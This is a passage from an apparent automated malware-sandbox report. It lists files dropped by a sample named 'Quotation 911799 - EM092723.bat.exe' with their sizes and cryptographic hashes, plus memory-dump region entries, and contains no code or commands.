                                        73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                                        SHA512

                                        6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                                      • C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat.exe
                                        Filesize

                                        423KB

                                        MD5

                                        c32ca4acfcc635ec1ea6ed8a34df5fac

                                        SHA1

                                        f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                                        SHA256

                                        73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                                        SHA512

                                        6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                                      • C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat.exe
                                        Filesize

                                        423KB

                                        MD5

                                        c32ca4acfcc635ec1ea6ed8a34df5fac

                                        SHA1

                                        f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                                        SHA256

                                        73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

                                        SHA512

                                        6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0pv4lslp.gj4.ps1
                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
                                        Filesize

                                        3KB

                                        MD5

                                        692d48c5157c06658ea1943fdb81cb10

                                        SHA1

                                        c2d55f1e275e7fcc1e2ee257075f2ba356c24e23

                                        SHA256

                                        c3eca5e15ecc59d2567bc32f7cf71dccd0e66118639be14b3b4edf7cb03bd698

                                        SHA512

                                        b50700ca8be453318976db8d179861666b7302657c02c22824a5153dbf62d0ed84ffb7ac888378507ff09a192c278e21f6bd46a34415ea0ddd44d4ad9251bc85

                                      • \??\pipe\LOCAL\crashpad_1940_GWOJJZTGEOPSGONL
                                        MD5

                                        d41d8cd98f00b204e9800998ecf8427e

                                        SHA1

                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                        SHA256

                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                        SHA512

                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                      • memory/732-182-0x0000000000400000-0x0000000000430000-memory.dmp
                                        Filesize

                                        192KB

                                      • memory/2740-176-0x00000000054D0000-0x00000000054E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/2740-170-0x00000000054D0000-0x00000000054E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/2740-174-0x00000000054D0000-0x00000000054E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/2740-175-0x00000000054D0000-0x00000000054E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/2740-168-0x00000000054D0000-0x00000000054E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/2740-169-0x00000000054D0000-0x00000000054E0000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-158-0x0000000002CF0000-0x0000000002D00000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-143-0x0000000002CF0000-0x0000000002D00000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-172-0x0000000002CF0000-0x0000000002D00000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-173-0x0000000002CF0000-0x0000000002D00000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-157-0x0000000006600000-0x000000000661A000-memory.dmp
                                        Filesize

                                        104KB

                                      • memory/4660-156-0x0000000007810000-0x0000000007E8A000-memory.dmp
                                        Filesize

                                        6.5MB

                                      • memory/4660-155-0x00000000060D0000-0x00000000060EE000-memory.dmp
                                        Filesize

                                        120KB

                                      • memory/4660-171-0x0000000002CF0000-0x0000000002D00000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-150-0x0000000002CF0000-0x0000000002D00000-memory.dmp
                                        Filesize

                                        64KB

                                      • memory/4660-144-0x0000000005320000-0x0000000005386000-memory.dmp
                                        Filesize

                                        408KB

                                      • memory/4660-142-0x00000000052B0000-0x0000000005316000-memory.dmp
                                        Filesize

                                        408KB

                                      • memory/4660-141-0x00000000051F0000-0x0000000005212000-memory.dmp
                                        Filesize

                                        136KB

                                      • memory/4660-140-0x00000000054C0000-0x0000000005AE8000-memory.dmp
                                        Filesize

                                        6.2MB

                                      • memory/4660-139-0x0000000002D00000-0x0000000002D36000-memory.dmp
                                        Filesize

                                        216KB